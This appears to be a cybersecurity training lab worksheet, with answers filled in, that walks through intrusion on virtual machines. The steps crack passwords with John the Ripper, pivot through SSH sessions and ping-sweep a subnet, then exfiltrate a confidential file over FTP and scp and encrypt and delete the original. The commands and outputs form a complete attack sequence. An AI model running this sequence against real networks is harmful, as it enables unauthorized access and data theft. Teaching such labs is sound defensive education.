Infiltration

What will be an ideal response?

---

Step 1. Crack the passwords using John the Ripper.
John the Ripper is a tool used to find weak passwords of users. In this step, you will use John
the Ripper to crack weak passwords.
a. From the Kali VM root prompt, verify that the shadow file is in the /root folder on Kali

VM.

b. At the root prompt on Kali VM, enter the john command to crack the passwords. Use

the show option to view cracked passwords reliably.
Note: The password cyberops was added to the /usr/share/john/password.lst file to speed up the
password cracking process.
```
root@kali:~# john --show /root/shadow.txt
analyst:cyberops:17338:0:99999:7:::
1 password hash cracked, 7 left
```

After you have cracked the password for the user analyst, you can access Metasploit-
able via SSH using the login name analyst.

Step 2. Find the targeted host.
In this step, you will use different commands to find the IP address of a possible host on the
internal network behind the DMZ.

a. Establish an SSH session to the Metasploitable VM. E nter yes to accept the RSA digi-
tal signature when connecting for the first time. Connection may take a few moments.

Enter cyberops as the password when prompted.
```
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
```

b. Verify that you have root access to Metasploitable. Enter the su -l myroot at the
prompt. Notice that the prompt has changed from analyst@metasploitable to root@
metasploitable.
```
analyst@metasploitable:~$ su -l myroot
root@metasploitable:~#
```

c. Display the /etc/shadow file.
```
root@metasploitable:~# cat /etc/shadow
```

d. Enter exit at the prompt to return to the access privileges of the user analyst.
e. Now display the /etc/shadow file as analyst.
```
analyst@metasploitable:~$ cat /etc/shadow
```
Why did you receive an error message? Record the message and explain.
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
____________________________________________________________________________
The error message is cat /etc/shadow: Permission denied. Because the /etc/shadow file
is only readable by the owner root and user in the group shadow, the user analyst does
not have the permission to read the file as indicated by the ls -l /etc/shadow command.
It can be read by the user myroot because myroot has root privileges.
f. Enter ifconfig to list all the network interfaces on Metasploitable.
```
analyst@metasploitable:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:ab:84:07
inet addr:209.165.200.235 Bcast:209.165.200.255
Mask:255.255.255.224
inet6 addr: fe80::a00:27ff:feab:8407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1610 errors:0 dropped:0 overruns:0 frame:0
TX packets:1550 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:117030 (114.2 KB) TX bytes:123570 (120.6 KB)
Interrupt:10 Base address:0xd020

```

g. Enter ip route to determine the default gateway for this network.
```
analyst@metasploitable:~$ ip route
209.165.200.224/27 dev eth0 proto kernel scope link src 209.165.200.235
default via 209.165.200.226 dev eth0 metric 100
```

What is the default gateway?
____________________________________________________________________________
209.165.200.226

h. In the same terminal window, establish another SSH session to the Security Onion VM
at 209.165.200.226 (eth1 interface) as the user analyst. Enter yes to accept the RSA
digital signature when connecting for the first time. It could take a few moments to
connect. Use the password cyberops when prompted.
```
analyst@metasploitable:~$ ssh analyst@209.165.200.226
```

i. Enter ifconfig to view the list of network interfaces.
```
analyst@SecOnion:~$ ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:c3:cd:8c
inet addr:192.168.0.1 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fec3:cd8c/64 Scope:Link
UP BROADCAST RUNNING PROMISC MULTICAST MTU:1500 Metric:1
RX packets:8 errors:0 dropped:0 overruns:0 frame:0
TX packets:64 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:656 (656.0 B) TX bytes:9377 (9.3 KB)

```

j. You have determined the subnet for the LAN, 192.168.0.0/24. Now you will use a for
loop to determine the active hosts on the LAN. To save time, you will only ping the
first 15 hosts.
```
analyst@SecOnion:~$ for ((i=1;i<15;i+=1)); do ping -c 2 192.168.0.$i; done
PING 192.168.0.1 (192.168.0.1) 56(84) bytes of data.
64 bytes from 192.168.0.1: icmp_seq=1 ttl=64 time=0.067 ms
64 bytes from 192.168.0.1: icmp_seq=2 ttl=64 time=0.027 ms
--- 192.168.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.028/0.031/0.034/0.003 ms

PING 192.168.0.11 (192.168.0.11) 56(84) bytes of data.
64 bytes from 192.168.0.11: icmp_seq=1 ttl=64 time=0.606 ms
64 bytes from 192.168.0.11: icmp_seq=2 ttl=64 time=0.262 ms
--- 192.168.0.11 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.262/0.434/0.606/0.172 ms

```

k. Only 192.168.0.1 (Security Onion eth0) and 192.168.0.11 (CyberOps Workstation
VM) are responding to the ping requests. Establish an SSH session into the CyberOps
Workstation VM. Enter yes to accept the RSA digital signature when connecting for
the first time. Enter cyberops as the password.
```
analyst@SecOnion:~$ ssh 192.168.0.11
```

Step 3. Exfiltrate a confidential file.
You now have access to the CyberOps Workstation VM through a series of SSH sessions
(Kali VM > Security Onion VM > CyberOps Workstation VM) using the password that

was cracked in a previous step. Now you will access a confidential file and exfiltrate the con-
tent.

a. Verify that you are in the analyst’s home directory. Change directory to lab.support.

files.
```
[analyst@secOps ~]$ cd lab.support.files
```
b. List the files that are in the directory. Verify that confidential.txt file is in the folder.
c. Establish an FTP session to the Metasploitable VM. Use the default user analyst and

enter cyberops as the password.
```
[analyst@secOps lab.support.files]$ ftp 209.165.200.235
Connected to 209.165.200.235.
220 (vsFTPd 2.3.4)
Name (209.165.200.235:analyst): analyst
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
```

d. Upload the confidential.txt file to the Metasploitable VM. Now you have access to the

file and you can move it to the Kali VM for your use if desired.
```
ftp> put confidential.txt
200 PORT command successful. Consider using PASV.
150 Ok to send data.
226 Transfer complete.
103 bytes sent in 0.000104 seconds (41.6 kbytes/s)
```

e. Enter quit when you have finished transferring the file.
Step 4. Encrypt the data and remove the original.
a. Threat actors often will encrypt the confidential data and store it locally, possibly for
ransoming later. Zip the confidential.txt file and encrypt it. Enter cyberops as the
password.
```
analyst@secOps lab.support.files]$ zip -e confidential.zip confidential.txt
Enter password:
Verify password:
adding: confidential.txt (deflated 4%)
```

b. Remove the confidential.txt file from CyberOps Workstation VM.
```
[analyst@secOps lab.support.files]$ rm confidential.txt
```

c. Enter exit three times until you are back at the root@kali:~# prompt.
d. Now the attacker can copy the file from the FTP on the Metasploitable VM to the Kali
VM. This could take a few moments. Enter the password cyberops when prompted.
```
root@kali:~# scp analyst@209.165.200.235:/home/analyst/confidential.txt ~
analyst@209.165.200.235's password:
confidential.txt 100% 102 102.1KB/s 00:00
```

Note: You can copy the file directly from CyberOps Workstation VM to the Kali VM if there is a user
account other than root configured on Kali VM. Because FTP transmits the content in plaintext, you
will be able to view the content in packets using Wireshark.
e. If desired, you can log back into Metasploitable and remove the file confidential.txt

from the FTP server.
```
root@kali:~# ssh analyst@209.165.200.235
analyst@209.165.200.235's password:
analyst@metasploitable:~$ rm confidential.txt
```

f. At this time, you can shut down Metasploitable, CyberOps Workstation, and Kali vir-
tual machines.